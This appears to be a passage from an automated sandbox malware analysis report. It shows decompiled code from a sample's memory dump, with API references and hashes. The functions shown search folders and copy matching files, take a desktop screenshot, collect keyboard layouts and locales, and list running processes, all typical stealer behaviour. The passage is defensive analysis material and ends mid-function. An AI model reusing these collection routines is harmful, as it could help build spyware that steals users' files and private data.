                                                                    • wsprintfA.USER32 ref: 0041023C
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00410253
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC4), ref: 00410274
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC8), ref: 0041028E
                                                                    • _sprintf.LIBCMT ref: 004102B5
                                                                    • _memset.LIBCMT ref: 004102C8
                                                                    • wsprintfA.USER32 ref: 004102F5
                                                                    • StrCmpCA.SHLWAPI(?), ref: 0041030B
                                                                    • StrCmpCA.SHLWAPI(?), ref: 0041033A
                                                                      • Part of subcall function 0040E9B8: __EH_prolog3_GS.LIBCMT ref: 0040E9C2
                                                                      • Part of subcall function 0040E9B8: _memset.LIBCMT ref: 0040E9E9
                                                                      • Part of subcall function 0040E9B8: lstrcatA.KERNEL32(?,?,?,?), ref: 0040E9FE
                                                                      • Part of subcall function 0040E9B8: lstrcatA.KERNEL32(?,00000000), ref: 0040EA14
                                                                      • Part of subcall function 0040E9B8: CopyFileA.KERNEL32(?,?,00000001), ref: 0040EA24
                                                                      • Part of subcall function 0040E9B8: StrCmpCA.SHLWAPI(?,0043C8D8), ref: 0040EB07
                                                                      • Part of subcall function 0040E9B8: StrCmpCA.SHLWAPI(00000000,0043C8D8), ref: 0040EB13
                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00410464
                                                                    • FindClose.KERNEL32(?), ref: 00410478
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileFind$_memsetlstrcatwsprintf$CloseCopyFirstH_prolog3_Next_sprintf
                                                                    • String ID: %s\%s$%s\%s\%s\%s$%s\*
                                                                    • API String ID: 166131113-3933763253
                                                                    • Opcode ID: e0c73e2ef28e50aa6f66c2d223931159302e3954ac875876c2766596e9b71bf3
                                                                    • Instruction ID: 9bca9961ce39c9fd88c96c55bbcb497666ecec60079e0324722dba36a41e37c6
                                                                    • Opcode Fuzzy Hash: e0c73e2ef28e50aa6f66c2d223931159302e3954ac875876c2766596e9b71bf3
                                                                    • Instruction Fuzzy Hash: 87713FB090022DAFCF21DF61CC88EDA7B7CBB46304F4405EAA608A2151E7759AC5CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 17%
                                                                    			E004166F5(void* __edx) {
                                                                    				signed int _v8;
                                                                    				char _v24;
                                                                    				struct tagRECT _v40;
                                                                    				struct HDC__* _v44;
                                                                    				char _v48;
                                                                    				void* _v52;
                                                                    				void* _v56;
                                                                    				char _v60;
                                                                    				intOrPtr _v64;
                                                                    				char _v68;
                                                                    				void* _v72;
                                                                    				char _v88;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t35;
                                                                    				intOrPtr _t37;
                                                                    				struct HDC__* _t49;
                                                                    				void* _t51;
                                                                    				int _t61;
                                                                    				void* _t72;
                                                                    				void* _t77;
                                                                    				signed int _t82;
                                                                    
                                                                    				_t77 = __edx;
                                                                    				_t35 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t35 ^ _t82;
                                                                    				_t37 =  *0x4461f0; // 0x0
                                                                    				_v64 = _t37;
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				asm("stosd");
                                                                    				_t81 = 0;
                                                                    				_push(0);
                                                                    				_push( &_v88);
                                                                    				_t80 = 1;
                                                                    				_push( &_v68);
                                                                    				_v88 = 1;
                                                                    				if( *0x446434() == 0) {
                                                                    					_push( &_v60);
                                                                    					_push(1);
                                                                    					_push(0);
                                                                    					if( *0x446394() == 0) {
                                                                    						_t80 = GetDesktopWindow();
                                                                    						GetWindowRect(_t80,  &_v40);
                                                                    						_t49 = GetDC(_t80);
                                                                    						_v44 = _t49;
                                                                    						_t72 = CreateCompatibleDC(_t49);
                                                                    						_t51 = CreateCompatibleBitmap(_v44, _v40.right, _v40.bottom);
                                                                    						_v56 = _t51;
                                                                    						_v72 = SelectObject(_t72, _t51);
                                                                    						BitBlt(_t72, 0, 0, _v40.right, _v40.bottom, _v44, 0, 0, 0xcc0020);
                                                                    						_push( &_v48);
                                                                    						_push(0);
                                                                    						_push(_v56);
                                                                    						if( *0x4463f4() == 0 && E00416670(0,  &_v24) != 0xffffffff) {
                                                                    							_push(0);
                                                                    							_push( &_v24);
                                                                    							_push(_v60);
                                                                    							_push(_v48);
                                                                    							if( *0x4463c8() == 0) {
                                                                    								_t61 =  *0x446290(_v60,  &_v52);
                                                                    								GlobalFix(_v52);
                                                                    								_t81 = _t61;
                                                                    								E0041CE7C(_v64, "\\screenshot.jpg", GlobalSize(_v52), 3);
                                                                    								SelectObject(_t72, _v72);
                                                                    								 *0x446308(_v48);
                                                                    								 *0x446414(_v68);
                                                                    								DeleteObject(_v56);
                                                                    								DeleteObject(_t72);
                                                                    								ReleaseDC(_t80, _v44);
                                                                    								CloseWindow(_t80);
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return E0041DA9B(0, _t72, _v8 ^ _t82, _t77, _t80, _t81);
                                                                     			}

                                                                    APIs
                                                                    • GetDesktopWindow.USER32 ref: 0041674C
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00416759
                                                                    • GetDC.USER32(00000000), ref: 00416760
                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0041676A
                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041677B
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00416786
                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004167A2
                                                                    • GlobalFix.KERNEL32(?), ref: 004167F6
                                                                    • GlobalSize.KERNEL32(?), ref: 00416801
                                                                    • SelectObject.GDI32(00000000,?), ref: 00416820
                                                                    • DeleteObject.GDI32(00000001), ref: 0041683B
                                                                    • DeleteObject.GDI32(00000000), ref: 00416842
                                                                    • ReleaseDC.USER32(00000000,?), ref: 0041684C
                                                                    • CloseWindow.USER32(00000000), ref: 00416853
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Object$Window$CompatibleCreateDeleteGlobalSelect$BitmapCloseDesktopRectReleaseSize
                                                                    • String ID: \screenshot.jpg
                                                                    • API String ID: 527014841-3844582059
                                                                    • Opcode ID: f6728a3a4a2e7bb19a1c90d60e336044d0564f73320422b4ca5a619c80478f71
                                                                    • Instruction ID: c39ea76d3917f63f8044a0ac1e8f906f23aba1cd166b36e8cb092cada6b9df5f
                                                                    • Opcode Fuzzy Hash: f6728a3a4a2e7bb19a1c90d60e336044d0564f73320422b4ca5a619c80478f71
                                                                    • Instruction Fuzzy Hash: 3741F676900208BFDF11AFE4ED489EEBF7DFF0A711B110029F606E2120D73499559B6A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 58%
                                                                    			E00411117(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, char* _a12) {
                                                                    				signed int _v12;
                                                                    				char _v280;
                                                                    				char _v544;
                                                                    				char _v808;
                                                                    				char _v1808;
                                                                    				struct _WIN32_FIND_DATAA _v2128;
                                                                    				intOrPtr _v2132;
                                                                    				void* _v2136;
                                                                    				char* _v2140;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t35;
                                                                    				int _t42;
                                                                    				void* _t53;
                                                                    				char* _t62;
                                                                    				CHAR* _t73;
                                                                    				void* _t78;
                                                                    				void* _t80;
                                                                    				intOrPtr _t81;
                                                                    				intOrPtr _t82;
                                                                    				signed int _t83;
                                                                    				void* _t84;
                                                                    				void* _t85;
                                                                    				void* _t86;
                                                                    
                                                                    				_t80 = __edx;
                                                                    				_t35 =  *0x443674; // 0x393162b1
                                                                    				_v12 = _t35 ^ _t83;
                                                                    				_t82 = _a8;
                                                                    				_t81 = _a4;
                                                                    				_v2140 = _a12;
                                                                    				_v2132 = __ecx;
                                                                    				wsprintfA( &_v808, "%s\\*", _t82);
                                                                    				_t85 = _t84 + 0xc;
                                                                    				_t42 = FindFirstFileA( &_v808,  &_v2128);
                                                                    				_v2136 = _t42;
                                                                    				if(_t42 != 0xffffffff) {
                                                                    					_t73 = "%s\\%s";
                                                                    					do {
                                                                    						_push(".");
                                                                    						_push( &(_v2128.cFileName));
                                                                    						if( *0x446458() != 0) {
                                                                    							_push("..");
                                                                    							_push( &(_v2128.cFileName));
                                                                    							if( *0x446458() != 0) {
                                                                    								wsprintfA( &_v544, _t73, _t82,  &(_v2128.cFileName));
                                                                    								_t86 = _t85 + 0x10;
                                                                    								_t53 =  *0x446458(_t81, 0x43c8d8);
                                                                    								_push( &(_v2128.cFileName));
                                                                    								if(_t53 != 0) {
                                                                    									wsprintfA( &_v280, _t73, _t81);
                                                                    									_t85 = _t86 + 0x10;
                                                                    								} else {
                                                                    									wsprintfA( &_v280, "%s");
                                                                    									_t85 = _t86 + 0xc;
                                                                    								}
                                                                    								if(PathMatchSpecA( &(_v2128.cFileName), _v2140) != 0) {
                                                                    									_t78 = 0x3e8;
                                                                    									_t62 =  &_v1808;
                                                                    									do {
                                                                    										 *_t62 = 0;
                                                                    										_t62 = _t62 + 1;
                                                                    										_t78 = _t78 - 1;
                                                                    									} while (_t78 != 0);
                                                                    									lstrcatA( &_v1808,  *0x445ce4);
                                                                    									lstrcatA( &_v1808,  &_v280);
                                                                    									E0041CE7C( *((intOrPtr*)(_v2132 + 0x20)),  &_v1808, 0, 2);
                                                                    									_t85 = _t85 + 0xc;
                                                                    								}
                                                                    								E00411117(_v2132, _t80,  &_v280,  &_v544, _v2140);
                                                                    							}
                                                                    						}
                                                                    					} while (FindNextFileA(_v2136,  &_v2128) != 0);
                                                                    					_t42 = FindClose(_v2136);
                                                                    				}
                                                                    				return E0041DA9B(_t42, _t73, _v12 ^ _t83, _t80, _t81, _t82);
                                                                     			}

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: wsprintf$Find$Filelstrcat$CloseFirstMatchNextPathSpec
                                                                    • String ID: %s\%s$%s\*
                                                                    • API String ID: 3375986482-2848263008
                                                                    • Opcode ID: 9ac857b251d21aab175aa0b9588577910a50320045fe88e55300eb9c087c5f16
                                                                    • Instruction ID: 71d4b98c3729e101340706fa9899053da89462c958fedec868a107e351819c4e
                                                                    • Opcode Fuzzy Hash: 9ac857b251d21aab175aa0b9588577910a50320045fe88e55300eb9c087c5f16
                                                                    • Instruction Fuzzy Hash: B1412E7590021CABCF11EB64DC49FDAB7BCFB0A305F0445EAE649E2151DA34AA848F99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 25%
                                                                    			E0041048F(intOrPtr __ecx, CHAR* _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16) {
                                                                    				signed int _v8;
                                                                    				char _v276;
                                                                    				char _v540;
                                                                    				struct _WIN32_FIND_DATAA _v860;
                                                                    				CHAR* _v864;
                                                                    				CHAR* _v868;
                                                                    				void* _v872;
                                                                    				intOrPtr _v876;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t41;
                                                                    				CHAR* _t44;
                                                                    				int _t49;
                                                                    				void* _t67;
                                                                    				intOrPtr _t76;
                                                                    				intOrPtr _t89;
                                                                    				CHAR* _t90;
                                                                    				signed int _t91;
                                                                    				void* _t92;
                                                                    				void* _t93;
                                                                    
                                                                    				_t41 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t41 ^ _t91;
                                                                    				_t90 = _a12;
                                                                    				_t89 = _a16;
                                                                    				_v868 = _a4;
                                                                    				_t44 = _a8;
                                                                    				_v864 = _t44;
                                                                    				_t76 = __ecx;
                                                                    				_v876 = __ecx;
                                                                    				wsprintfA( &_v540, "%s\\*", _t44);
                                                                    				_t93 = _t92 + 0xc;
                                                                    				_t49 = FindFirstFileA( &_v540,  &_v860);
                                                                    				_v872 = _t49;
                                                                    				if(_t49 == 0xffffffff) {
                                                                    					L18:
                                                                    					return E0041DA9B(_t49, _t76, _v8 ^ _t91, _t88, _t89, _t90);
                                                                    				} else {
                                                                    					goto L1;
                                                                    				}
                                                                    				do {
                                                                    					L1:
                                                                    					_push(".");
                                                                    					_push( &(_v860.cFileName));
                                                                    					if( *0x446458() == 0) {
                                                                    						goto L16;
                                                                    					}
                                                                    					_push("..");
                                                                    					_push( &(_v860.cFileName));
                                                                    					if( *0x446458() == 0) {
                                                                    						goto L16;
                                                                    					}
                                                                    					wsprintfA( &_v276, "%s\\%s", _v864,  &(_v860.cFileName));
                                                                    					_t93 = _t93 + 0x10;
                                                                    					_push( *0x445ec0);
                                                                    					_push( &(_v860.cFileName));
                                                                    					if( *0x446458() != 0) {
                                                                    						_push( *0x445a68);
                                                                    						_push( &(_v860.cFileName));
                                                                    						if( *0x446458() != 0) {
                                                                    							_push( *0x4461d8);
                                                                    							_push( &(_v860.cFileName));
                                                                    							if( *0x446458() != 0) {
                                                                    								_t67 =  *0x446458( &(_v860.cFileName),  *0x445ad4);
                                                                    								if(_t67 != 0) {
                                                                    									if((_v860.dwFileAttributes & 0x00000010) == 0) {
                                                                    										goto L16;
                                                                    									}
                                                                    									L15:
                                                                    									E0041048F(_t76,  &(_v860.cFileName),  &_v276, _t90, _t89);
                                                                    									goto L16;
                                                                    								}
                                                                    								if( *((intOrPtr*)(_t76 + 2)) != _t67) {
                                                                    									E0040FE87( &_v276, _v868, _t90, _t89);
                                                                    									_t76 = _v876;
                                                                    									_t93 = _t93 + 0xc;
                                                                    								}
                                                                    								goto L15;
                                                                    							}
                                                                    							_push(_v864);
                                                                    							if( *0x446234() != 0) {
                                                                    								goto L15;
                                                                    							}
                                                                    							_push(_t90);
                                                                    							E0040F878(_v864, _t88);
                                                                    							L5:
                                                                    							goto L15;
                                                                    						}
                                                                    						E0041001C( &_v276, _v868, _t90, _t89);
                                                                    						_t93 = _t93 + 0xc;
                                                                    						goto L15;
                                                                    					}
                                                                    					_t88 = _v868;
                                                                    					E0040FB18( &_v276, _v868, _t90, _t89);
                                                                    					goto L5;
                                                                    					L16:
                                                                    				} while (FindNextFileA(_v872,  &_v860) != 0);
                                                                    				_t49 = FindClose(_v872);
                                                                    				goto L18;
                                                                    			}

























                                                                    APIs
                                                                    • wsprintfA.USER32 ref: 004104D2
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004104E9
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC4), ref: 0041050A
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC8), ref: 00410524
                                                                    • wsprintfA.USER32 ref: 0041054B
                                                                    • StrCmpCA.SHLWAPI(?), ref: 00410561
                                                                    • StrCmpCA.SHLWAPI(?), ref: 00410592
                                                                      • Part of subcall function 0040FB18: _memset.LIBCMT ref: 0040FB53
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?,004132CB,0043C8D8,?), ref: 0040FB68
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?,00000000), ref: 0040FB7E
                                                                      • Part of subcall function 0040FB18: CopyFileA.KERNEL32(?,?,00000001), ref: 0040FB8E
                                                                      • Part of subcall function 0040FB18: _memset.LIBCMT ref: 0040FB9F
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?,0043C8E0), ref: 0040FBB4
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?), ref: 0040FBC7
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?,0043C8E0), ref: 0040FBD5
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?,?), ref: 0040FBE8
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?,0043F090), ref: 0040FBFA
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?,?), ref: 0040FC08
                                                                      • Part of subcall function 0040FB18: lstrcatA.KERNEL32(?,.txt), ref: 0040FC1A
                                                                      • Part of subcall function 0040FB18: GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040FC6C
                                                                      • Part of subcall function 0040FB18: HeapAlloc.KERNEL32(00000000), ref: 0040FC73
                                                                    • FindNextFileA.KERNEL32(?,?), ref: 00410651
                                                                    • FindClose.KERNEL32(?), ref: 00410665
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$FileFind$Heap_memsetwsprintf$AllocCloseCopyFirstNextProcess
                                                                    • String ID: %s\%s$%s\*
                                                                    • API String ID: 1524811457-2848263008
                                                                    • Opcode ID: 975b028da7206236778b1ab5de5829895a91347a30c8addd8f54e00f02ad0e7c
                                                                    • Instruction ID: efe4cf5bec2eb240efd75cd6a1a133d8a1522e46aa05a8509384cd33b717e5c8
                                                                    • Opcode Fuzzy Hash: 975b028da7206236778b1ab5de5829895a91347a30c8addd8f54e00f02ad0e7c
                                                                    • Instruction Fuzzy Hash: 80517A7190021DABCF22EF61DC45EDA7BBCBB4A314F0444A6E509E2160DB749BD4CF19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 75%
                                                                    			E0041593C() {
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t20;
                                                                    				int _t24;
                                                                    				int _t27;
                                                                    				void* _t40;
                                                                    				void* _t41;
                                                                    				void* _t44;
                                                                    				signed int _t46;
                                                                    				void* _t47;
                                                                    				void* _t50;
                                                                    				signed int _t52;
                                                                    				void* _t54;
                                                                    				void* _t55;
                                                                    				void* _t57;
                                                                    
                                                                    				_t52 = _t54 - 0x190;
                                                                    				_t55 = _t54 - 0x210;
                                                                    				_t20 =  *0x443674; // 0x393162b1
                                                                    				 *(_t52 + 0x18c) = _t20 ^ _t52;
                                                                    				_t46 = 0;
                                                                    				 *(_t52 - 0x78) = HeapAlloc(GetProcessHeap(), 0, 0x1f4);
                                                                    				 *((intOrPtr*)(_t52 - 0x7c)) = 0;
                                                                    				_t24 = GetKeyboardLayoutList(0, 0);
                                                                    				_t40 = LocalAlloc(0x40, _t24 << 2);
                                                                    				_t27 = GetKeyboardLayoutList(_t24, _t40);
                                                                    				 *(_t52 - 0x80) = _t27;
                                                                    				if(_t27 != 0) {
                                                                    					do {
                                                                    						GetLocaleInfoA( *(_t40 + _t46 * 4) & 0x0000ffff, 2, _t52 - 0x74, 0x200);
                                                                    						_push(_t52 - 0x74);
                                                                    						if( *((intOrPtr*)(_t52 - 0x7c)) == 0) {
                                                                    							wsprintfA( *(_t52 - 0x78), "%s");
                                                                    							_t57 = _t55 + 0xc;
                                                                    						} else {
                                                                    							_push( *(_t52 - 0x78));
                                                                    							wsprintfA( *(_t52 - 0x78), "%s / %s");
                                                                    							_t57 = _t55 + 0x10;
                                                                    						}
                                                                    						 *((intOrPtr*)(_t52 - 0x7c)) =  *((intOrPtr*)(_t52 - 0x7c)) + 1;
                                                                    						E00426300(_t52 - 0x74, 0, 0x200);
                                                                    						_t55 = _t57 + 0xc;
                                                                    						_t46 = _t46 + 1;
                                                                    					} while (_t46 <  *(_t52 - 0x80));
                                                                    				}
                                                                    				if(_t40 != 0) {
                                                                    					LocalFree(_t40);
                                                                    				}
                                                                    				_pop(_t47);
                                                                    				_pop(_t50);
                                                                    				_pop(_t41);
                                                                    				return E0041DA9B( *(_t52 - 0x78), _t41,  *(_t52 + 0x18c) ^ _t52, _t44, _t47, _t50);
                                                                    			}




















                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000000,000001F4,00000000,0043C8DC,00000000), ref: 00415962
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00415969
                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00415977
                                                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 00415985
                                                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0041598F
                                                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 004159AD
                                                                    • wsprintfA.USER32 ref: 004159C8
                                                                    • wsprintfA.USER32 ref: 004159DB
                                                                    • _memset.LIBCMT ref: 004159EE
                                                                    • LocalFree.KERNEL32(00000000), ref: 00415A01
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocHeapKeyboardLayoutListLocalwsprintf$FreeInfoLocaleProcess_memset
                                                                    • String ID: %s / %s
                                                                    • API String ID: 2849719339-2910687431
                                                                    • Opcode ID: 20cfd44a24f21baeb74b6d7a0a39def26dc5ba0bf7a2f973d3dfa5853cf7acf9
                                                                    • Instruction ID: d84ff11409299512e8b233a12289bc073feddbd73ff054decb92e3fca7afa228
                                                                    • Opcode Fuzzy Hash: 20cfd44a24f21baeb74b6d7a0a39def26dc5ba0bf7a2f973d3dfa5853cf7acf9
                                                                    • Instruction Fuzzy Hash: 7F2191B5900208EBDB209FB5EC49EEE7B78FB4A305F21003AF911E2152D7745944CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 90%
                                                                    			E00415A22(void* __ebx, void* __edx, void* __edi, CHAR* __esi, void* __eflags) {
                                                                    				CHAR* _t26;
                                                                    				void* _t33;
                                                                    				void* _t35;
                                                                    				CHAR* _t36;
                                                                    				void* _t37;
                                                                    
                                                                    				_t36 = __esi;
                                                                    				_t33 = __edx;
                                                                    				_t30 = __ebx;
                                                                    				_push(0x14c);
                                                                    				E0042083E(E004345F1, __ebx, __edi, __esi);
                                                                    				 *(_t37 - 0x158) = 0x128;
                                                                    				_t35 = CreateToolhelp32Snapshot(2, 0);
                                                                    				if(Process32First(_t35, _t37 - 0x158) != 0) {
                                                                    					while(Process32Next(_t35, _t37 - 0x158) != 0) {
                                                                    						lstrcatA(_t36, "- ");
                                                                    						lstrcatA(_t36, _t37 - 0x134);
                                                                    						lstrcatA(_t36, " [");
                                                                    						_push( *((intOrPtr*)(_t37 - 0x150)));
                                                                    						_t26 = E00415F45(_t30, _t37 - 0x2c, _t33, _t35, _t36, __eflags);
                                                                    						 *(_t37 - 4) =  *(_t37 - 4) & 0x00000000;
                                                                    						__eflags = _t26[0x14] - 0x10;
                                                                    						if(_t26[0x14] >= 0x10) {
                                                                    							_t26 =  *_t26;
                                                                    						}
                                                                    						lstrcatA(_t36, _t26);
                                                                    						_t9 = _t37 - 4;
                                                                    						 *_t9 =  *(_t37 - 4) | 0xffffffff;
                                                                    						__eflags =  *_t9;
                                                                    						E00404354(_t37 - 0x2c, 1, 0);
                                                                    						lstrcatA(_t36, "]\n");
                                                                    					}
                                                                    				}
                                                                    				CloseHandle(_t35);
                                                                    				return E00420888(_t30, _t35, _t36);
                                                                    			}









                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00415A2C
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415A3F
                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 00415A4F
                                                                    • lstrcatA.KERNEL32(?,0043F544), ref: 00415A61
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00415A6F
                                                                    • lstrcatA.KERNEL32(?,0043EC94), ref: 00415A7B
                                                                    • lstrcatA.KERNEL32(?,00000000,?), ref: 00415A9D
                                                                    • lstrcatA.KERNEL32(?,0043EC98,00000001,00000000), ref: 00415AB9
                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 00415AC7
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00415AD2
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$Process32$CloseCreateFirstH_prolog3_HandleNextSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 4202092735-0
                                                                    • Opcode ID: 76ef1b5bd33c02a3f490de90ab32f3375581ee919b702102ce2506128cc86233
                                                                    • Instruction ID: 75e5ab016ba9d0325d5b1fc38600bbf14b35468b598a44f2275c61a8cb821180
                                                                    • Opcode Fuzzy Hash: 76ef1b5bd33c02a3f490de90ab32f3375581ee919b702102ce2506128cc86233
                                                                    • Instruction Fuzzy Hash: DF11BF30541514EFDB00AF60DC49FEE7B38AF4B751F200065F101A61E0CB784A898B6E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 89%
                                                                    			E0040781A(void* __ebx, void* __ecx, signed int __edx, intOrPtr _a4) {
                                                                    				signed int _v12;
                                                                    				char _v280;
                                                                    				char _v544;
                                                                    				struct _SYSTEMTIME _v560;
                                                                    				signed char _v561;
                                                                    				signed char _v562;
                                                                    				signed char _v563;
                                                                    				signed int _v564;
                                                                    				void* _v568;
                                                                    				signed int _v572;
                                                                    				char _v576;
                                                                    				struct _FILETIME _v584;
                                                                    				char _v586;
                                                                    				char _v587;
                                                                    				char _v588;
                                                                    				struct _FILETIME _v596;
                                                                    				struct _FILETIME _v604;
                                                                    				unsigned int _v636;
                                                                    				intOrPtr _v660;
                                                                    				intOrPtr _v664;
                                                                    				unsigned int _v672;
                                                                    				unsigned int _v688;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t162;
                                                                    				intOrPtr _t164;
                                                                    				void* _t165;
                                                                    				signed int _t173;
                                                                    				void* _t175;
                                                                    				signed int _t177;
                                                                    				void* _t178;
                                                                    				signed int _t182;
                                                                    				signed int _t183;
                                                                    				signed int _t184;
                                                                    				signed int _t191;
                                                                    				unsigned int _t203;
                                                                    				long _t215;
                                                                    				void* _t217;
                                                                    				signed char _t222;
                                                                    				long _t239;
                                                                    				long _t247;
                                                                    				signed int _t250;
                                                                    				void _t255;
                                                                    				void* _t262;
                                                                    				void _t266;
                                                                    				void _t267;
                                                                    				signed int _t271;
                                                                    				unsigned int _t280;
                                                                    				signed int _t282;
                                                                    				unsigned int _t284;
                                                                    				signed int _t291;
                                                                    				signed int _t292;
                                                                    				signed char* _t303;
                                                                    				signed int _t311;
                                                                    				signed char _t317;
                                                                    				signed int _t326;
                                                                    				signed int _t327;
                                                                    				intOrPtr* _t338;
                                                                    				signed int _t340;
                                                                    				signed int _t342;
                                                                    				signed int _t347;
                                                                    
                                                                    				_t313 = __edx;
                                                                    				_t262 = __ebx;
                                                                    				_t162 =  *0x443674; // 0x393162b1
                                                                    				_v12 = _t162 ^ _t347;
                                                                    				_t164 = _a4;
                                                                    				_t337 = __ecx;
                                                                    				_v568 = __ecx;
                                                                    				if(_t164 < 0xffffffff) {
                                                                    					L64:
                                                                    					_t165 = 0x10000;
                                                                    					L65:
                                                                    					return E0041DA9B(_t165, _t262, _v12 ^ _t347, _t313, _t328, _t337);
                                                                    				}
                                                                    				_t328 =  *__ecx;
                                                                    				if(_t164 >=  *((intOrPtr*)( *__ecx + 4))) {
                                                                    					goto L64;
                                                                    				}
                                                                    				if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
                                                                    					E0040772D(_t328);
                                                                    					_t164 = _a4;
                                                                    				}
                                                                    				 *(_t337 + 4) =  *(_t337 + 4) | 0xffffffff;
                                                                    				if(_t164 !=  *((intOrPtr*)(_t337 + 0x134))) {
                                                                    					__eflags = _t164 - 0xffffffff;
                                                                    					if(_t164 != 0xffffffff) {
                                                                    						_t266 =  *_t337;
                                                                    						__eflags = _t164 -  *((intOrPtr*)(_t266 + 0x10));
                                                                    						if(_t164 <  *((intOrPtr*)(_t266 + 0x10))) {
                                                                    							E00407035(_t266);
                                                                    							_t337 = _v568;
                                                                    							_t164 = _a4;
                                                                    						}
                                                                    						_t267 =  *_t337;
                                                                    						__eflags =  *((intOrPtr*)(_t267 + 0x10)) - _t164;
                                                                    						if( *((intOrPtr*)(_t267 + 0x10)) >= _t164) {
                                                                    							L14:
                                                                    							_t328 = 0x104;
                                                                    							E00406E12( *_t337,  &_v688, 0,  &_v280, 0x104);
                                                                    							_t173 = E004071E7(__eflags,  *_t337,  &_v572,  &(_v584.dwHighDateTime),  &_v576);
                                                                    							__eflags = _t173;
                                                                    							if(_t173 == 0) {
                                                                    								_t313 = _v584.dwHighDateTime;
                                                                    								_t175 =  *( *_t337);
                                                                    								_t337 = 0;
                                                                    								__eflags = E004069C3(_t175, _v584.dwHighDateTime, 0);
